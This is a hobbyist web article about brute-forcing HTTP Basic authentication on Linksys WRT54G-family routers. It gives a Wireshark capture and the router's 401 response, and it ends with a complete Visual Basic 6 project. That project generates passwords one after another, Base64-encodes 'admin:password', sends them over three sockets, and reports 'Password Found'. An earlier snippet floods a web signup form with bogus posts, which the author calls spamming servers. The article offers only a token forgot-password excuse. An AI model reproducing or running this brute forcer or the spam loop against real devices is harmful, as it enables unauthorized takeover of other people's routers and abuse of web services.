.: Links :.
Home | Forums | Desert Computer Agents
.: Brute Forcing AAA Authencation :.
By Nicholas A. Hall
The general idea of a brute forcer, Most of the time.. is to guess the password to authenticate with a system
that dose not do a check on invalid request. For example, Myspace log in says you may only log in 5 times before they
disable your email for 24 hours. But a lot of systems such as Linksys Routers don't have that sort of protection
integrated with them so brute forcing is a method to take the unit over by making thousands of connections at once
and having each connection guess its own combination of user names and passwords! With the example below this is a
Visual Basic 6 example of sending post commands witch is about 80% of the chance when submitting a Form / AAA
authentication to gain Root/Admin to a Device such as a Linksys/Belkin Router. Just by changing the code a little bit
you can have this submit a combination of authentication methods to spoof Login credentials and gain access within
minutes depending on the password.
[code]
Dim I As Integer
Private Sub Form_Load()
Winsock2.LocalPort = 88
Winsock2.Listen
I = 99
Start
End Sub
Private Sub Start()
I = I + 1
If I < 1000 Then
Winsock1.Close
Winsock1.Connect "192.168.2.6", 80
End If
End Sub
Private Sub Winsock1_Connect()
Winsock1.SendData "POST http://192.168.2.6/signup.php HTTP/1.0" & vbCrLf
Winsock1.SendData "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, _
application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, _
application/vnd.ms-xpsdocument, application/xaml+xml, */*"
Winsock1.SendData "Referer: http://192.168.2.6/signup.php" & vbCrLf
Winsock1.SendData "Content-Type: application/x-www-form-urlencoded" & vbCrLf
Winsock1.SendData "Connection: keep-alive" & vbCrLf
Winsock1.SendData "Host: 192.168.2.6" & vbCrLf
Winsock1.SendData "Proxy-Connection: Keep-Alive" & vbCrLf
Winsock1.SendData "Content-Length: 36" & vbCrLf
Winsock1.SendData "Pragma: no-cache" & vbCrLf
Winsock1.SendData "Cookie: PHPSESSID=ffqnvvpef9pjb3lqms9r21quk5" & vbCrLf
Winsock1.SendData vbCrLf
Winsock1.SendData "name=youve&user=been" & I & "&pass=spammed"
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
'Winsock1.GetData Data, vbString
'Debug.Print Data
Debug.Print I
End Sub
Private Sub Winsock1_SendComplete()
DoEvents
Call Start
End Sub
Private Sub Winsock2_ConnectionRequest(ByVal requestID As Long)
Winsock2.Close
Winsock2.Accept requestID
End Sub
Private Sub Winsock2_DataArrival(ByVal bytesTotal As Long)
Winsock2.GetData Data, vbString
MsgBox Data
End Sub
[/code]
Now reading that Brute forcing can be changed slightly to spam out servers with request / Submitting bogus information.
The big thing we are going to look into is AAA Authentication, A huge thing with wireless networks such as the WRT54G.
That also applies to the GS Series up to WRT350 which is in about 70% of businesses and homes, a lot of the time they are
open and unencrypted and sometimes not so much. But for legitimate reasons if you forgot the password and don't have a
paper clip in handy you can try brute forcing the Unit to recover the password =). The first thing we are going to do is
try to browse to the Administration page and see what kind of Authentication we are up agence. we see as soon as we go to
the routers default page http://192.168.1.1/ we are greeted with a Box that wont even let us click out to view source.
That right their tells use they are using whats called AAA Basic Authentication. A simple method that has the browser submit
the credentials as part of the GET/POST request to show the router we are a Unrestricted user. Once we put in junk to see
if it will let us in it will prompt us with the same thing over and over until a Unauthorized User is displayed saying
basically to get out.
NOW, where do we go from here? The Authentication is basically flawless from the average joe to get around without going to
collage for 6 years and learning all about security except for one main fact that it dose not set a time interval between
log in attempts all in all making it possible for a computer to go and guess the password for us while we kick back and
drink coffee/Monster =). now opening up Wireshark i see what is being sent when i type test for the user name and test
for the password.
Wireshark feeds us something like this
0000 00 1a 70 5c bb dc 00 18 39 08 ca 8e 08 00 45 00 ..p\.... 9.....E.
0010 01 bc 40 5c 40 00 80 06 35 25 c0 a8 01 69 c0 a8 ..@\@... 5%...i..
0020 01 01 c4 0d 00 50 cf be 94 01 f8 7a 6d be 50 18 .....P.. ...zm.P.
0030 11 1c fe 0d 00 00 47 45 54 20 2f 20 48 54 54 50 ......GE T / HTTP
0040 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 31 39 32 2e /1.1..Ho st: 192.
0050 31 36 38 2e 31 2e 31 0d 0a 55 73 65 72 2d 41 67 168.1.1. .User-Ag
0060 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 ent: Moz illa/5.0
0070 20 28 57 69 6e 64 6f 77 73 3b 20 55 3b 20 57 69 (Window s; U; Wi
0080 6e 64 6f 77 73 20 4e 54 20 36 2e 30 3b 20 65 6e ndows NT 6.0; en
0090 2d 55 53 3b 20 72 76 3a 31 2e 39 2e 30 2e 31 30 -US; rv: 1.9.0.10
00a0 29 20 47 65 63 6b 6f 2f 32 30 30 39 30 34 32 33 ) Gecko/ 20090423
00b0 31 36 20 46 69 72 65 66 6f 78 2f 33 2e 30 2e 31 16 Firef ox/3.0.1
00c0 30 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 0..Accep t: text/
00d0 68 74 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e html,app lication
00e0 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 /xhtml+x ml,appli
00f0 63 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d 30 2e 39 cation/x ml;q=0.9
0100 2c 2a 2f 2a 3b 71 3d 30 2e 38 0d 0a 41 63 63 65 ,*/*;q=0 .8..Acce
0110 70 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 2d pt-Langu age: en-
0120 75 73 2c 65 6e 3b 71 3d 30 2e 35 0d 0a 41 63 63 us,en;q= 0.5..Acc
0130 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a ept-Enco ding: gz
0140 69 70 2c 64 65 66 6c 61 74 65 0d 0a 41 63 63 65 ip,defla te..Acce
0150 70 74 2d 43 68 61 72 73 65 74 3a 20 49 53 4f 2d pt-Chars et: ISO-
0160 38 38 35 39 2d 31 2c 75 74 66 2d 38 3b 71 3d 30 8859-1,u tf-8;q=0
0170 2e 37 2c 2a 3b 71 3d 30 2e 37 0d 0a 4b 65 65 70 .7,*;q=0 .7..Keep
0180 2d 41 6c 69 76 65 3a 20 33 30 30 0d 0a 43 6f 6e -Alive: 300..Con
0190 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c nection: keep-al
01a0 69 76 65 0d 0a 41 75 74 68 6f 72 69 7a 61 74 69 ive..Aut horizati
01b0 6f 6e 3a 20 42 61 73 69 63 20 64 47 56 7a 64 44 on: Basi c dGVzdD
01c0 70 30 5a 58 4e 30 0d 0a 0d 0a p0ZXN0.. ..
What is important is parsing the information so its readable and 0d 0a Hex
are just CRLF next lines. after clearing it up we get this.
GET / HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv: 1.9.0.10) Gecko/2009042316 Firefox/3.0.10..Accept:
text/html,application/xhtml+xml,application/x ml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q= 0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,u tf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Authorization: Basic dGVzdDp0ZXN0
Now the only thing out of the normal on a GET / POST with firefox is this new line its sending called "Authorization"
Doing a Quick Wiki on it should tell you more then I can but to point out the facts what is after is the type
which WRT family uses "Basic" which uses a method of a string concated USER a Collen ":" and the Password.
Opening up Cain and Able and launching the BASE64 decoder and pasting Encrypted form of the Credentals you get(dGVzdDp0ZXN0)
[VB6]
Dim I As Integer
Private Sub Form_Load()
I = 0
Start
End Sub
Private Sub Start()
I = I + 1
If I < 1000 Then
Winsock1.Connect "192.168.1.1", 80
End If
End Sub
Private Sub Winsock1_Connect()
Debug.Print "Sending Authenication!"
Winsock1.SendData "GET / HTTP/1.0" & vbCrLf
Winsock1.SendData "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, _
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*"
Winsock1.SendData "Content-Type: application/x-www-form-urlencoded" & vbCrLf
Winsock1.SendData "Connection: keep-alive" & vbCrLf
Winsock1.SendData "Host: 192.168.1.1" & vbCrLf
Winsock1.SendData "Authorization: Basic dGVzdDp0ZXN0" & vbCrLf
Winsock1.SendData vbCrLf
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Winsock1.GetData Data, vbString
Debug.Print Data
End Sub
[/VB6]
Response:
Sending Authenication!
HTTP/1.0 401 Unauthorized Access Denied
Server: Intoto Http Server v1.0
WWW-Authenticate: Basic realm="WRT54GS"
Content-type: text/html
Pragma: no-cache
Connection: Close
401 Unauthorized
401 Unauthorized
Authorization required.
Now we got a response, A negative one in fact but a response none the less.
Now all that data is perfectly set and their are no check sums to write for AAA which makes
creating a Brute Forcer simple. The only part we of the string we have to change is the part after
"Authorization: Basic" then appended our half what Encrypted string then append CRLF twice to end
the HTTP get.
So now we have to generate a function that loops until the password is found from the host. After some
messing around I ran across a issue where the router would be exhausted from so many connections over and
over and would start denying them, So I wrapped by function in a timer control and slowed it down to only
5 connections p/s. Which is not bad at all, I mean its not any 650,000 per second like a MD5 Brute Forcer,
But still I mean this can easily run in the background of the system until it gets the passwords, Days, Months.
[VB6]
Dim MyString As String
Dim MyAppenedString As String
Const Range As String = "z" 'z
Private Sub Timer1_Timer()
Debug.Print Text1.Text
If (Left(Text1.Text, 1)) = Range Then
Dim MyString As String
MyString = Text1.Text
For i = 1 To Len(Text1.Text)
If Mid(MyString, i, 1) = Range Then
If i = Len(Text1.Text) Then 'IF Last Number
'Text1.Text = Left(Text1.Text, Len(Text1.Text) - 1) & Chr(48) & Chr(48) 'If last place value is a 9
Text1.Text = Left(MyString, Len(Text1.Text) - 1) & Chr(48) & Chr(48) 'If last place value is a 9
Else
Mid(MyString, i, 1) = Chr(48) ' "0"
End If
Else
Mid(MyString, i, 1) = Chr(Asc(Mid(MyString, i, 1)) + 1)
Text1.Text = MyString
Exit For
End If
Next
Else
'Else Just Increment The Left Most Value
Text1.Text = Chr(Asc(Left(Text1.Text, 1)) + 1) & Right(Text1.Text, Len(Text1.Text) - 1)
End If
End Sub
[/VB6]
then we must encrypted the generated password with the username in the following format in Base64
Username : Password <--- No spaces (I.E. admin:mypassword)
[VB6]
Private Function EncodeBase64(ByRef arrData() As Byte) As String
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
' help from MSXML
Set objXML = New MSXML2.DOMDocument
' byte array to base64
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.nodeTypedValue = arrData
EncodeBase64 = objNode.Text
' thanks, bye
Set objNode = Nothing
Set objXML = Nothing
End Function
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
' help from MSXML
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
' thanks, bye
Set objNode = Nothing
Set objXML = Nothing
End Function
[/VB6]
Now with those combine it should be enough to do everything we need! Oh ya, and we need to await a response to see if the
attempt was succesfull or not.
[VB6]
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Winsock1.GetData Data, vbString
Debug.Print Data
Debug.Print InStr(1, Data, "401 Unauthorized", vbBinaryCompare)
If Left$(Data, 12) = "HTTP/1.0 200" Then
Form1.Caption = "Password Found! - " & Text1.Text
Else
Winsock1_Close
End If
End Sub
[/VB6]
Now thats peachy and everything but what if, the router can handle our request pefectly fine, Just dont Inc the attepted
password enless connection is succesfull. After all that, In the end we get this.
[VB6]
VERSION 5.00
Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX"
Begin VB.Form Form1
Caption = "0"
ClientHeight = 840
ClientLeft = 120
ClientTop = 420
ClientWidth = 4275
LinkTopic = "Form1"
ScaleHeight = 840
ScaleWidth = 4275
StartUpPosition = 3 'Windows Default
Begin MSWinsockLib.Winsock Winsock3
Left = 840
Top = 480
_ExtentX = 741
_ExtentY = 741
_Version = 393216
End
Begin MSWinsockLib.Winsock Winsock2
Left = 480
Top = 480
_ExtentX = 741
_ExtentY = 741
_Version = 393216
End
Begin VB.CommandButton Command1
Caption = "GO"
Height = 375
Left = 3480
TabIndex = 1
Top = 120
Width = 615
End
Begin MSWinsockLib.Winsock Winsock1
Left = 120
Top = 480
_ExtentX = 741
_ExtentY = 741
_Version = 393216
End
Begin VB.TextBox Text1
Height = 375
Left = 120
TabIndex = 0
Text = "0"
Top = 120
Width = 3135
End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'add a project reference to Microsoft XML, v2.6 (or later)
Dim MyString As String
Dim MyAppenedString As String
Const Range As String = "z" 'z
Dim I As Integer
Private Sub Command1_Click()
MyString = Text1.Text
Winsock1.Connect "192.168.1.1", 80
'Winsock2.Connect "192.168.1.1", 80
'Winsock3.Connect "192.168.1.1", 80
End Sub
Private Sub Winsock1_Close()
'Debug.Print "Socket Closing"
Winsock1.Close
'Debug.Print "Socket Closed"
If Text1.Text = "admin" Then Exit Sub
Winsock1.Connect "192.168.1.1", 80
'Debug.Print "Socket Connecting"
End Sub
Private Sub Winsock1_Connect()
'Debug.Print "Socket Connected"
I = 0
'Debug.Print Text1.Text
If (Left(MyString, 1)) = Range Then
For I = 1 To Len(MyString)
If Mid(MyString, I, 1) = Range Then 'If It hits the Last Possable Value
If I = Len(MyString) Then 'IF Last Number
MyString = Left(MyString, Len(MyString) - 1) & Chr(48) & Chr(48) 'If last place value is a 9
Else
Mid(MyString, I, 1) = Chr(48) ' "0"
End If
Text1.Text = MyString
Else
If Chr(Asc(Mid(MyString, I, 1)) + 1) = Chr(65) Or Chr(Asc(Mid(MyString, I, 1)) + 1) = Chr(58) Then
Mid(MyString, I, 1) = Chr(97)
Else
Mid(MyString, I, 1) = Chr(Asc(Mid(MyString, I, 1)) + 1)
End If
Text1.Text = MyString
Exit For
End If
Next
Else
'Else Just Increment The Left Most Value
'Makes Checks here for Surpassed value
If Chr(Asc(Left(MyString, 1)) + 1) = Chr(65) Or Chr(Asc(Left(MyString, 1)) + 1) = Chr(58) Then
MyString = Chr(97) & Right(MyString, Len(MyString) - 1)
Else
MyString = Chr(Asc(Left(MyString, 1)) + 1) & Right(MyString, Len(MyString) - 1)
End If
Text1.Text = MyString
End If
Debug.Print "Sending Authenication! - " & EncodeBase64(StrConv("admin:" & Text1.Text, vbFromUnicode))
Winsock1.SendData "GET / HTTP/1.0" & vbCrLf
Winsock1.SendData "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, _
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*"
Winsock1.SendData "Content-Type: application/x-www-form-urlencoded" & vbCrLf
Winsock1.SendData "Connection: keep-alive" & vbCrLf
Winsock1.SendData "Host: 192.168.1.1" & vbCrLf
Winsock1.SendData "Authorization: Basic " & EncodeBase64(StrConv("admin:" & MyString, vbFromUnicode)) & vbCrLf
Winsock1.SendData vbCrLf
End Sub
Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Winsock1.GetData Data, vbString
'Debug.Print "401 Unauthorized"
Debug.Print Data
Debug.Print InStr(1, Data, "401 Unauthorized", vbBinaryCompare)
'If InStr(1, Data, "401 Unauthorized", vbBinaryCompare) = 0 Then
If Left$(Data, 12) = "HTTP/1.0 200" Then
Form1.Caption = "Password Found! - " & Text1.Text
Else
Winsock1_Close
End If
End Sub
Private Function EncodeBase64(ByRef arrData() As Byte) As String
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
' help from MSXML
Set objXML = New MSXML2.DOMDocument
' byte array to base64
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.nodeTypedValue = arrData
EncodeBase64 = objNode.Text
' thanks, bye
Set objNode = Nothing
Set objXML = Nothing
End Function
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
' help from MSXML
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
' thanks, bye
Set objNode = Nothing
Set objXML = Nothing
End Function
Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, _
ByVal HelpContext As Long, CancelDisplay As Boolean)
'Debug.Print "Winsock Error: " & Number & "-" & Description
Form1.Caption = Form1.Caption + 1
Winsock1_Close
End Sub
Private Sub Winsock2_Connect()
'Debug.Print "Socket Connected"
I = 0
'Debug.Print Text1.Text
If (Left(MyString, 1)) = Range Then
For I = 1 To Len(MyString)
If Mid(MyString, I, 1) = Range Then 'If It hits the Last Possable Value
If I = Len(MyString) Then 'IF Last Number
MyString = Left(MyString, Len(MyString) - 1) & Chr(48) & Chr(48) 'If last place value is a 9
Else
Mid(MyString, I, 1) = Chr(48) ' "0"
End If
Text1.Text = MyString
Else
If Chr(Asc(Mid(MyString, I, 1)) + 1) = Chr(65) Or Chr(Asc(Mid(MyString, I, 1)) + 1) = Chr(58) Then
Mid(MyString, I, 1) = Chr(97)
Else
Mid(MyString, I, 1) = Chr(Asc(Mid(MyString, I, 1)) + 1)
End If
'Text1.Text = MyString
Exit For
End If
Next
Else
'Else Just Increment The Left Most Value
'Makes Checks here for Surpassed value
If Chr(Asc(Left(MyString, 1)) + 1) = Chr(65) Or Chr(Asc(Left(MyString, 1)) + 1) = Chr(58) Then
MyString = Chr(97) & Right(MyString, Len(MyString) - 1)
Else
MyString = Chr(Asc(Left(MyString, 1)) + 1) & Right(MyString, Len(MyString) - 1)
End If
'Text1.Text = MyString
End If
'Debug.Print "Sending Authenication! - " & EncodeBase64(StrConv("Admin:" & Text1.Text, vbFromUnicode))
Winsock2.SendData "GET / HTTP/1.0" & vbCrLf
Winsock2.SendData "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, _
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*"
Winsock2.SendData "Content-Type: application/x-www-form-urlencoded" & vbCrLf
Winsock2.SendData "Connection: keep-alive" & vbCrLf
Winsock2.SendData "Host: 192.168.1.1" & vbCrLf
Winsock2.SendData "Authorization: Basic " & EncodeBase64(StrConv("Admin:" & MyString, vbFromUnicode)) & vbCrLf
Winsock2.SendData vbCrLf
End Sub
Private Sub Winsock2_DataArrival(ByVal bytesTotal As Long)
Winsock2.GetData Data, vbString
If InStr(1, Data, "401 Unauthorized", vbBinaryCompare) = 0 Then
Form1.Caption = "Password Found! - " & Text1.Text
Else
Winsock2_Connect
End If
End Sub
Private Sub Winsock2_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, _
ByVal HelpContext As Long, CancelDisplay As Boolean)
Form1.Caption = Form1.Caption + 1
Winsock2_Close
End Sub
Private Sub Winsock2_Close()
Winsock2.Close
Winsock2.Connect "192.168.1.1", 80
End Sub
Private Sub Winsock3_Connect()
'Debug.Print "Socket Connected"
I = 0
'Debug.Print Text1.Text
If (Left(MyString, 1)) = Range Then
For I = 1 To Len(MyString)
If Mid(MyString, I, 1) = Range Then 'If It hits the Last Possable Value
If I = Len(MyString) Then 'IF Last Number
MyString = Left(MyString, Len(MyString) - 1) & Chr(48) & Chr(48) 'If last place value is a 9
Else
Mid(MyString, I, 1) = Chr(48) ' "0"
End If
Text1.Text = MyString
Else
If Chr(Asc(Mid(MyString, I, 1)) + 1) = Chr(65) Or Chr(Asc(Mid(MyString, I, 1)) + 1) = Chr(58) Then
Mid(MyString, I, 1) = Chr(97)
Else
Mid(MyString, I, 1) = Chr(Asc(Mid(MyString, I, 1)) + 1)
End If
'Text1.Text = MyString
Exit For
End If
Next
Else
'Else Just Increment The Left Most Value
'Makes Checks here for Surpassed value
If Chr(Asc(Left(MyString, 1)) + 1) = Chr(65) Or Chr(Asc(Left(MyString, 1)) + 1) = Chr(58) Then
MyString = Chr(97) & Right(MyString, Len(MyString) - 1)
Else
MyString = Chr(Asc(Left(MyString, 1)) + 1) & Right(MyString, Len(MyString) - 1)
End If
'Text1.Text = MyString
End If
'Debug.Print "Sending Authenication! - " & EncodeBase64(StrConv("Admin:" & Text1.Text, vbFromUnicode))
Winsock3.SendData "GET / HTTP/1.0" & vbCrLf
Winsock3.SendData "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, _
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*"
Winsock3.SendData "Content-Type: application/x-www-form-urlencoded" & vbCrLf
Winsock3.SendData "Connection: keep-alive" & vbCrLf
Winsock3.SendData "Host: 192.168.1.1" & vbCrLf
Winsock3.SendData "Authorization: Basic " & EncodeBase64(StrConv("Admin:" & MyString, vbFromUnicode)) & vbCrLf
Winsock3.SendData vbCrLf
End Sub
Private Sub Winsock3_DataArrival(ByVal bytesTotal As Long)
Winsock3.GetData Data, vbString
If InStr(1, Data, "401 Unauthorized", vbBinaryCompare) = 0 Then
Form1.Caption = "Password Found! - " & Text1.Text
Else
Winsock3_Connect
End If
End Sub
Private Sub Winsock3_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, _
ByVal HelpContext As Long, CancelDisplay As Boolean)
Form1.Caption = Form1.Caption + 1
Winsock3_Close
End Sub
Private Sub Winsock3_Close()
Winsock3.Close
Winsock3.Connect "192.168.1.1", 80
End Sub
[/VB6]
This article is nowhere near complete, and needs a lot of revising, If you think you got any suggestions at all, PLEASE DROP AN EMAIL!
.: Links :.
Home | Forums | Desert Computer Agents